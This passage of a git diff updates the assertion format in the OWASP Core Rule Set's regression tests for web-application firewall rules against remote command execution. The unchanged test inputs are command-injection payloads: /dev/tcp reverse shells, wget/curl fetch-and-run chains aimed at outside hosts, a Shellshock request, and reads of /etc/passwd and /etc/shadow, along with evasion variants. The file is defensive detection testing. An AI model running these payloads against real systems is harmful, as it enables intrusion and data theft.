-wrapper sh,-c,curl\ google.com . version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 39 desc: "9323HNQU" stages: @@ -724,7 +762,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 40 desc: "9323HNQU" stages: @@ -741,7 +780,8 @@ tests: code=;vim dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 41 desc: "9323HNQU" stages: @@ -758,7 +798,8 @@ tests: code=;ex dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 42 desc: "9323HNQU" stages: @@ -775,7 +816,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 43 desc: "9323HNQU" stages: @@ -792,7 +834,8 @@ tests: code=;vim -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 44 desc: "9323HNQU" stages: @@ -809,7 +852,8 @@ tests: code=;ex -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 45 desc: "ATFHUJVF" stages: @@ -826,7 +870,8 @@ tests: code=;gdb -nx -ex \!whoami -ex quit version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 46 desc: "JW2SU88A" stages: @@ -843,7 +888,8 @@ tests: data: | code=;cat /path/file.gz output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 47 desc: "FP with word environment" stages: @@ -858,7 +904,8 @@ tests: uri: "/get?args=;environment" version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 48 desc: "FP with word performance" stages: @@ -873,7 +920,8 @@ tests: uri: "/get?args=;performance" version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 49 desc: "Block execution of env command with arguments" stages: @@ -889,7 +937,8 @@ tests: data: "args=;env --version" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 50 desc: "Block evasion using here string" stages: @@ -906,7 +955,8 @@ tests: data: | code=;`cat<<<sh -c whoami` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 51 desc: "Block evasion using here string with space" stages: @@ -923,7 +973,8 @@ tests: data: | code=;`cat<<< sh -c whoami` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 52 desc: "Block evasion using here string with single quotes" stages: @@ -940,7 +991,8 @@ tests: data: | code=;`cat<<<'sh -c whoami'` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 53 desc: "Block evasion using here string with double quotes" stages: @@ -957,7 +1009,8 @@ tests: data: | code=;`cat<<<"sh -c whoami"` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 54 desc: "Block evasion using here string with command substitution" stages: @@ -974,7 +1027,8 @@ tests: data: | code=;`cat<<<$(sh -c whoami)` output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 55 desc: "Block `time` prefix" stages: @@ -991,7 +1045,8 @@ tests: data: | code=time sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 56 desc: "Block `strace` prefix" stages: @@ -1008,7 +1063,8 @@ tests: data: | code=strace sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 57 desc: "Block `nohup` prefix" stages: @@ -1025,4 +1081,5 @@ tests: data: | code=nohup sh -c whoami output: - log_contains: id "932230" + log: + expect_ids: [932230] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml index 31c1af5ac..3330afade 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml @@ -24,4 +24,5 @@ tests: data: "arg=ifconfig;.+rm+-rf+/;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.0 output: - log_contains: id "932231" + log: + expect_ids: [932231] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index 08692c1c1..068a16d9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?arg=%3Bps" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 2 desc: "/?arg=|vi (x" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?arg=%7Cvi%20%28x" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 3 desc: "/?arg=&w (x" stages: @@ -51,7 +53,8 @@ tests: uri: "/get?arg=%26w%20%28x" version: HTTP/1.0 output: - log_contains: id "932232" + log: + expect_ids: [932232] - test_id: 4 desc: "/?arg=&aptitude" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?arg=%26aptitude" version: HTTP/1.0 output: - no_log_contains: id "932232" + log: + no_expect_ids: [932232] - test_id: 5 desc: Remote Command Execution bypass with time stages: @@ -84,7 +88,8 @@ tests: uri: "/get?foo=time+who" version: HTTP/1.1 output: - log_contains: "id \"932232\"" + log: + expect_ids: [932232] - test_id: 6 desc: Remote Command Execution bypass with time negative test stages: @@ -101,7 +106,8 @@ tests: uri: "/get?foo=time+warner" version: HTTP/1.1 output: - no_log_contains: "id \"932232\"" + log: + no_expect_ids: [932232] - test_id: 7 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -118,4 +124,5 @@ tests: uri: "/get?foo=ti''me+who" version: HTTP/1.1 output: - log_contains: "id \"932232\"" + log: + expect_ids: [932232] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index e48735f53..4ae77be63 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml @@ -20,7 +20,8 @@ tests: code=;find /etc -name passwd -exec cat {} + version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 2 desc: "5Y3V6UZT" stages: @@ -37,7 +38,8 @@ tests: code=cd /;cd etc;column passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 3 desc: "6BIVX1QB" stages: @@ -54,7 +56,8 @@ tests: code=cd /;cd etc;bridge -b passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 4 desc: "7JRJIWP8" stages: @@ -71,7 +74,8 @@ tests: code=cd /;cd etc;fold passwd version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 5 desc: "ANQ9SN3S" stages: @@ -88,7 +92,8 @@ tests: code=;flock -u / whoami version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 6 desc: "AVI5619I" stages: @@ -105,7 +110,8 @@ tests: code=;cd /;cd etc;base32 passwd|base32 -d version: HTTP/1.0 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 7 desc: "P6E0KY27" stages: @@ -122,7 +128,8 @@ tests: data: | code=;cpulimit -l 100 -f whoami output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 8 desc: "PDDUY935" stages: @@ -139,7 +146,8 @@ tests: data: | cd /;cd etc;comm passwd passwd output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 9 desc: "PDDUY935 - but uppercase" stages: @@ -156,7 +164,8 @@ tests: data: | CD /;CD ETC;COMM PASSWD PASSWD output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 10 desc: "FP with word comment" stages: @@ -171,7 +180,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 11 desc: "FP with word performance" stages: @@ -186,7 +196,8 @@ tests: uri: "/get?args=;performance" version: HTTP/1.0 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 12 desc: "Block execution of perf command with arguments" stages: @@ -202,7 +213,8 @@ tests: data: "args=;perf --version" version: HTTP/1.1 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 13 desc: "Block evasion using here string" stages: @@ -219,7 +231,8 @@ tests: data: | code=;`cat<<<ifconfig` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 14 desc: "Block evasion using here string with space" stages: @@ -236,7 +249,8 @@ tests: data: | code=;`cat<<< ifconfig` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 15 desc: "Block evasion using here string with single quotes" stages: @@ -253,7 +267,8 @@ tests: data: | code=;`cat<<<'ifconfig'` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 16 desc: "Block evasion using here string with double quotes" stages: @@ -270,7 +285,8 @@ tests: data: | code=;`cat<<<"ifconfig"` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 17 desc: "Block evasion using here string with command substitution" stages: @@ -287,7 +303,8 @@ tests: data: | code=;`cat<<<$(ifconfig)` output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 18 desc: "Block `time` prefix" stages: @@ -304,7 +321,8 @@ tests: data: | code=time ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 19 desc: "Block `strace` prefix" stages: @@ -321,7 +339,8 @@ tests: data: | code=strace ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 20 desc: False positive against "time" stages: @@ -339,7 +358,8 @@ tests: data: "var=hello; time he came" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 21 desc: False positive against "more" stages: @@ -357,7 +377,8 @@ tests: data: "var=a hero; more than" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expect_ids: [932235] - test_id: 22 desc: "Block `nohup` prefix" stages: @@ -374,7 +395,8 @@ tests: data: | code=nohup ifconfig output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 23 desc: "Block ad-hoc ansible commands" stages: @@ -391,7 +413,8 @@ tests: data: | code=time; ansible all -m ping output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 24 desc: "Block ansible config dump command" stages: @@ -408,7 +431,8 @@ tests: data: | code=time; ansible-config dump output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 25 desc: "Block installing collections from ansible galaxy" stages: @@ -425,7 +449,8 @@ tests: data: | code=time; ansible-galaxy collection install community.general output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 26 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -442,7 +467,8 @@ tests: data: | code=time; ansible-console output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 27 desc: "Block ansible-doc command" stages: @@ -459,7 +485,8 @@ tests: data: | code=time; ansible-doc plugin ping output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 28 desc: "Block dumping ansible inventory file and variables" stages: @@ -476,7 +503,8 @@ tests: data: | code=time; ansible-inventory --list output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 29 desc: "Block ansible pull from remote repository" stages: @@ -493,7 +521,8 @@ tests: data: | code=time; ansible-pull --url example.com output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 30 desc: "Block decrypting ansible secrets" stages: @@ -510,7 +539,8 @@ tests: data: | code=time; ansible-vault decrypt secret output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 31 desc: "Block execution of ansible playbooks" stages: @@ -527,7 +557,8 @@ tests: data: | code=time; ansible-playbook site.yml output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 32 desc: "Block decryption of secrets with chef-vault" stages: @@ -544,7 +575,8 @@ tests: data: | code=time; chef-vault -i secret output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 33 desc: "Block execution of chef-shell command" stages: @@ -561,7 +593,8 @@ tests: data: | code=time; chef-shell output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 34 desc: "Block execution chef recipie book" stages: @@ -578,7 +611,8 @@ tests: data: | code=time; chef-run all recipie.rb output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 35 desc: "Block execution chef recipie book against a specific node" stages: @@ -595,7 +629,8 @@ tests: data: | code=time; chef-client -t 1.1.1.1 output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 36 desc: "Block execution of visudo" stages: @@ -612,7 +647,8 @@ tests: data: | code=time; visudo output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 37 desc: "Block execution of CrowdSec cscli" stages: @@ -629,7 +665,8 @@ tests: data: | code=time; cscli alerts list output: - log_contains: id "932235" + log: + expect_ids: [932235] - test_id: 38 desc: "FP against 'Times & Schedule` for `sched`" stages: @@ -644,4 +681,5 @@ tests: uri: "/get?test=Times%20%26%20Schedule" version: HTTP/1.1 output: - no_log_contains: id "932235" + log: + no_expectIds: [932235] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml index 9a746f9b0..9e8e3fd92 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml @@ -22,7 +22,8 @@ tests: version: HTTP/1.0 data: ;cp /var/log/apache2/error.log evil.php output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 2 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000" stages: @@ -41,7 +42,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 3 desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777" stages: @@ -58,7 +60,8 @@ tests: uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 4 desc: "55O5COJ5" stages: @@ -75,7 +78,8 @@ tests: code=;c89 -wrapper sh,-c,id . version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 5 desc: "55O5COJ5" stages: @@ -92,7 +96,8 @@ tests: code=;c89 -wrapper sh,-c,curl\ google.com . version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 6 desc: "9323HNQU - should not be detected at PL 2" stages: @@ -109,7 +114,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 7 desc: "9323HNQU" stages: @@ -126,7 +132,8 @@ tests: code=;vim dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 8 desc: "9323HNQU" stages: @@ -143,7 +150,8 @@ tests: code=;ex dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 9 desc: "9323HNQU - should not be detected at PL 2" stages: @@ -160,7 +168,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 10 desc: "9323HNQU" stages: @@ -177,7 +186,8 @@ tests: code=;vim -c:\!pwd version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 11 desc: "9323HNQU" stages: @@ -194,7 +204,8 @@ tests: code=;ex -c:\!pwd version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 12 desc: "ATFHUJVF" stages: @@ -211,7 +222,8 @@ tests: code=;gdb -nx -ex \!whoami -ex quit version: HTTP/1.0 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 13 desc: "JW2SU88A" stages: @@ -228,7 +240,8 @@ tests: data: | code=;cat /path/file.gz output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 14 desc: "4JOGUXYQ" stages: @@ -245,7 +258,8 @@ tests: data: | find /etc -name passwd -exec cat {} + output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 15 desc: "ANQ9SN3S" stages: @@ -262,7 +276,8 @@ tests: data: | code=flock -u / whoami output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 16 desc: "JW2SU88A" stages: @@ -279,7 +294,8 @@ tests: data: | code=cat /path/file.gz output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 17 desc: "P6E0KY27" stages: @@ -296,7 +312,8 @@ tests: data: | code=cpulimit -l 100 -f whoami output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 18 desc: "FP agains 'fi' without word boundary" stages: @@ -311,7 +328,8 @@ tests: uri: "/get?field_metatags[0][advanced][rights]=somevalue" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 19 desc: "FP MailerUI" stages: @@ -326,7 +344,8 @@ tests: uri: "/get?args=MailerUI" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 20 desc: "FP tasksListView" stages: @@ -341,7 +360,8 @@ tests: uri: "/get?args=tasksListView" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 21 desc: System Command Injection (932236) from old modsec regressions stages: @@ -360,7 +380,8 @@ tests: uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 22 desc: System Command Injection (932236) from old modsec regressions stages: @@ -379,7 +400,8 @@ tests: uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 23 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: @@ -398,7 +420,8 @@ tests: data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 24 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: @@ -417,7 +440,8 @@ tests: data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 25 desc: Positive test - RCE passed in one of the args stages: @@ -437,7 +461,8 @@ tests: arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 26 desc: RCE from test 932236.yaml combined with html entities in the middle stages: @@ -456,7 +481,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 27 desc: RCE from test 932236.yaml combined with html entities at the beginning stages: @@ -475,7 +501,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 28 desc: RCE from test 932236.yaml combined with html entities at the end stages: @@ -494,7 +521,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 29 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -513,7 +541,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 30 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -532,7 +561,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 31 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -551,7 +581,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 32 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: @@ -570,7 +601,8 @@ tests: data: "arg=%26%2359%3B+;top" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: @@ -589,7 +621,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 34 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: @@ -608,7 +641,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: @@ -627,7 +661,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 36 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: @@ -646,7 +681,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 37 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: @@ -665,7 +701,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 38 desc: "Unix command injection" stages: @@ -681,7 +718,8 @@ tests: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 39 desc: "Unix command injection" stages: @@ -697,7 +735,8 @@ tests: data: "var=`cut crs312``dig 34test`" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 40 stages: - input: @@ -711,7 +750,8 @@ tests: uri: "/get?932236-1=bash%20-c%20%22echo%20test%22" version: "HTTP/1.1" output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 41 stages: - input: @@ -726,7 +766,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 stages: @@ -743,7 +784,8 @@ tests: uri: "/get?foo=time+curl+coreruleset.org" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 43 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -760,7 +802,8 @@ tests: uri: "/get?foo=ti''me+curl+coreruleset.org" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 44 desc: "FP with word comment" stages: @@ -775,7 +818,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 45 desc: "FP with word settings" stages: @@ -790,7 +834,8 @@ tests: uri: "/get?args=settings" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 46 desc: False positive against "time" stages: @@ -808,7 +853,8 @@ tests: data: "var=hello; time he came" version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 47 desc: False positive against "more" stages: @@ -826,7 +872,8 @@ tests: data: "var=a hero; more than" version: HTTP/1.1 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 48 desc: "FP with word environment" stages: @@ -841,7 +888,8 @@ tests: uri: "/get?args=environment" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 49 desc: "FP with word performance" stages: @@ -856,7 +904,8 @@ tests: uri: "/get?args=performance" version: HTTP/1.0 output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 50 desc: "Block execution of env command with arguments" stages: @@ -872,7 +921,8 @@ tests: data: "args=env --version" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 51 desc: "Block execution of perf command with arguments" stages: @@ -888,7 +938,8 @@ tests: data: "args=perf --version" version: HTTP/1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 52 desc: "Block evasion using here string" stages: @@ -905,7 +956,8 @@ tests: data: | code=;`cat<<<ifconfig` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 53 desc: "Block evasion using here string with space" stages: @@ -922,7 +974,8 @@ tests: data: | code=;`cat<<< ifconfig` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 54 desc: "Block evasion using here string with single quotes" stages: @@ -939,7 +992,8 @@ tests: data: | code=;`cat<<<'ifconfig'` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 55 desc: "Block evasion using here string with double quotes" stages: @@ -956,7 +1010,8 @@ tests: data: | code=;`cat<<<"ifconfig"` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 56 desc: "Block evasion using here string with command substitution" stages: @@ -973,7 +1028,8 @@ tests: data: | code=;`cat<<<$(ifconfig)` output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 57 desc: "Block `time` prefix" stages: @@ -990,7 +1046,8 @@ tests: data: | code=time ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 58 desc: "Block `strace` prefix" stages: @@ -1007,7 +1064,8 @@ tests: data: | code=strace ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 59 desc: "Known false positive with `Cut` at start of string (expected failure)" stages: @@ -1024,7 +1082,8 @@ tests: data: | sentence=Cut orange quarters into crosswise slices about 1/8-inch thick. output: - log_contains: id "932236" + log: + expect_ids: 